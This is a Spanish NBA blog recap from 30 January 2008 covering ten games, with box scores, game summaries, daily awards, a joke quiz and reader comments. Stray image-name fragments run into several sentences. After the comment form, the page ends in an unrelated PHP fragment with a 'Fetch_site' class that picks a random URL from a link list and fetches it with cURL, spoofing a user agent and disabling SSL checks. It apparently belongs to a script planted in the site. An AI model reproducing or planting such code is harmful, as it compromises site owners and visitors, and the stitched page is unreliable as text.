La crónica (30/01/08)

31 de January de 2008 por MagicJohnson32

Diez partidos nos dejó la pasada madrugada y en un primer vistazo dos tanteos llaman la atención: los 69 y 67 puntos de Bucks y Bulls respectivamente. También la aplastante victoria de los Raptors y la derrota de los Hornets. Pero vayamos por partes, que lo primero es lo primero, y lo primero es el vídeo con la canasta decisiva de la jornada:

Box-scores:

Heat 91 – 107 Magic

Wizards 83 – 122 Raptors

Bucks 69 – 112 Sixers

Bulls 67 – 83 Wolves

Warriors 116 – 103 Hornets

Nuggets 106 – 102 Grizzlies

Knicks 89 – 100 Jazz

Cavs 84 – 83 Blazers

Bobcats 91 – 105 Kings

Hawks 88 – 95 Clippers

La crónica:

La pasada noche asistimos a una dura competición entre Bucks y Bulls por ver quién hacía el mayor ridículo. El premio fue compartido, ya que Chicago anotó dos puntos menos, 67 por los 69 de Milwaukee, pero éstos cayeron por 43 de diferencia ante los Sixers (mientras que la derrota de los Bulls ante Minnesota fue sólo por 16). En los Wolves, Jefferson y Gomes acapararon todo el protagonismo con 26-20 del primero y 25-10 del segundo, mientras que en los Sixers 7 jugadores anotaron 10 o más puntos. Casi tan contundente como el triunfo de los Sixers resultó el de los Raptors ante unos Wizards que esta vez, sin Butler, no pudieron plantar cara. Toronto, de nuevo con gran dirección de Calderón (11 asistencias y una pérdida), vengó la derrota en la prórroga de la noche anterior y se paseó desde el inicio (ganaba por 20 al descanso). No fue nohornetsvswarriorsexactamente un paseo el triunfo de los Magic sobre los Heat, cuando todo hacía indicar que Orlando ganaría con facilidad. Sin Wade ni Shaq ni Haslem, Miami puso más resistencia de la esperada gracias a un ataque equilibrado con seis jugadores por encima de los diez puntos y a un gran trabajo defensivo sobre Dwight Howard, al que limitaron a 16 puntos. Turkoglu volvió a ser el mejor de los Magic, que suman ya 20 triunfos más que su vecino estatal.

En New Orleans, los abucheos del público ayudaron a Baron Davis a superar la enfermedad que le había impedido entrenarse por la mañana. El ex jugador de los Hornets logró 5 triples y 9 asistencias y fue, junto a Stephen Jackson, el responsable del triunfo de los Warriors en cancha de los Hornets, que caen medio partido por debajo de los Suns en la cabeza de la Conferencia Oeste. Paul, West, Stojakovic y Chandler estuvieron bien pero los locales no pudieron frenar el ataque de unos Warriors que aún no disponen de Chris Webber. Por su parte, a los Grizzlies se les escapó otra victoria en los últimos minutos, esta vez ante unos Nuggets que necesitaron un parcial de 12-0 para remontar una diferencia de siete puntos en el tramo final. Sin Gasol ni Conley, Gay brilló con 30 puntos y 10 rebotes, y Milicic firmó una de sus mejores actuaciones con 14-16 y 5 tapones, pero Iverson fue más decisivo con 32 puntos, 12 asistencias y 4 robos.lebronjamesatportland

Deron Williams sumó un nuevo doble-doble y los Jazz volvieron a ganar. Los Knicks no pudieron parar al base, que sumó 22 puntos con 9 de 13 en tiros y 12 asistencias, mientras que Crawford, Randolph y Lee fueron los más destacados por los de NY. En Portland, LeBron James dio otra victoria a los Cavs con 37 puntos, 14 rebotes y una canasta a menos de un segundo para el final. Los Blazers pagaron así un mal último cuarto en el que anotaron 15 puntos y la frustración provocada a LeBron por los dos tapones que le colocó Przybilla.

En California se produjeron dos victorias locales. Primero los Kings contaron con grandes actuaciones de Brad Miller, Kevin Martin y Artest para superar a los Bobcats, que pagaron el mal día de Richardson. Y, por último, los Clippers obraron el milagro de ganar sin Kaman ni Maggette ni Brand a unos Hawks que vieron cómo Al Thornton explotó con 33 puntos en 33 minutos.

Seguimos con los premios del día:

Nuestro MVP: Hoy hemos sido testigos de exhibiciones anotadoras como la de Lebron James con 37 puntos, 17 de ellos en el último cuarto, o los 32 de Allen Iverson. También hemos podido ver exhibiciones reboteadoras como los 20 rebotes de Al Jefferson o los 21 de Brad Miller.turkogluvsheat Pero nuestro MVP irá para Hedo Turkoglu, autor de 27 puntos, 12 rebotes y 5 asistencias y un 8 de 13 en tiros. Gran temporada la que está firmando el turco.

El rookie: Últimamente cuentas con que si juega Al Horford hará una sobria actuación, que si Noah es titular cogerá 10 rebotes por partido, que si dan minutos a Thaddeus Young es probable que acabe con 10-5 fácilmente e incluso que Aaron Gray es capaz de hacer buenos números en muy poco tiempo. Esta noche no ha sido diferente pero los 33 puntos de Al Thornton los han eclipsado a todos. Para él el premio.

La sorpresa: Muchos jugadores han llamado nuestra atención esta pasada noche. Juan Dixon, Royal Ivey, Ricky Davis, Cris Quinn, Luke Jackson… Pero si alguien nos ha sorprendido muy, mucho, ése ha sido Darko Milicic que jugando 40 minutos ha anotado 14 puntos, recogido 16 rebotes y colocado 5 tapones. A ver si es la actuación que necesita para coger confianza en su juego.

La decepción: Nos cuesta personalizar la profunda decepción que sentimos en un solo jugador (aunque podríamos) por lo que hoy el dudoso honor se lo llevan los Chicago Bulls y los Milwaukke Bucks al completo, que no han sido capaces de pasar de 70 puntos. Lamentable.

Pasatiempos: ¿De qué se reía Dick Bavetta anoche?

bavettabuckssixers A) De que los Bucks fuesen aplastados por un equipo en el que juegan Giricek y Kevin Ollie

B) De que Kevin Ollie lograse su segunda mejor anotación de la temporada con 4 puntos

C) De que Royal Ivey sea titular y juegue 40 minutos mientras Charlie Bell se pudre en el banquillo

D) De los pívots suplentes de los Bucks: Ruffin, Gadzuric y Voskhul, casi nada.

E) Del 3 de 13 en tiros libres de Reggie Evans

F) De que, pese al punto E, Reggie Evans lograse en 17 minutos más puntos que Bogut, Jianlian y Charlie Bell juntos en 74 minutos

G) De que, después de 32 años arbitrando, se acaba de dar cuenta de que lleva los pantalones por encima del ombligo

Respuesta correcta: anoche los Bucks dieron risa así que cualquier cosa es posible, aunque no descartamos que se estuviese riendo al recordar un chiste de Charles Barkley. El premio es el DVD “Aprende a lanzar en suspensión con Reggie Evans”, con el triple que Evans logró el pasado 18 de enero ante los Celtics y que lo sitúa, junto a Brian Skinner (que lleva 2 de 2), como los únicos jugadores con un 100% en lanzamientos de 3 puntos de toda la liga.

Comenta

7 comentarios a esta entrada

  1. telekoman dice:
    #1

    Lamentables las actuaciones de Chicago y Milwaukee. Lo de Chicago es digno de estudio. Y además contra Minnesota, uno de los peores de la liga. Si Jordan levantara la cabeza…… Ay no, que no está muerto. Bueno, pues si Jordan se dignara a volver a jugar con los Bulls (seguro que ganaban más partidos…)

      Citar

  2. RusticoColorao dice:
    #2

    Pufff…acabo de ver un rato a Chicago y casi me pongo a llorar…pero sin Deng y Gordon el equipo es lamentable. No sé a quien salvar…quizás Noah los tiene buen puestos.

    Lo peor ha sido lo de Memphis…iban ganando de 7 a falta de un minuto y medio y han encajado un parcial de 0-10…por favor

      Citar

  3. Garci dice:
    #3

    joder, vaya marcadores los de los bulls y los de milwakee, es lamentable, sobretodo siendo equipos de la mejor liga del mundo.
    Otro doble doble para calderon, se esta saliendo el cabroncete, jeje!!
    El pobre sergio rodriguez, aparte de sufrir en el banquillo y jugar esos tristes minutillos que le dejan. Y encima, tiene que aguantar la genialidad de Lebron en el ultimo segundo.

    Y yo creo que la opcion correcta es la G, la de los pantalones, jejeje!!!

      Citar

  4. MagicJohnson32 dice:
    #4

    El DVD con el triple de Reggie Evans es para Garci 😉 ¡Guárdalo bien porque es histórico!

    ¡Grande Bavetta!

      Citar

  5. telekoman dice:
    #5

    Garcy, el problema es que aunque un jugador esté en la mejor liga del mundo no implica que sea un buen jugador y hay muchos ejemplos. Hay suplentes que casi no valdrían ni para la ACB. Y si hablaramos de entrenadores podríamos escribir un libro entero.

      Citar

  6. Viva_Dirk dice:
    #6

    No me lo creo Rustico, como puede perder Memphis dandole tantos minutos a Navarro, jeje.

      Citar

  7. Garci dice:
    #7

    Ya se, que hay jugadores en la nba, que no valen ni para la leb, pero tiene que haber de todo. Tambien existen banquillos en la nba, y tb hace falta calentarlos, jeje!!

    Gracias por dedicarme el video magicjohnson32!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>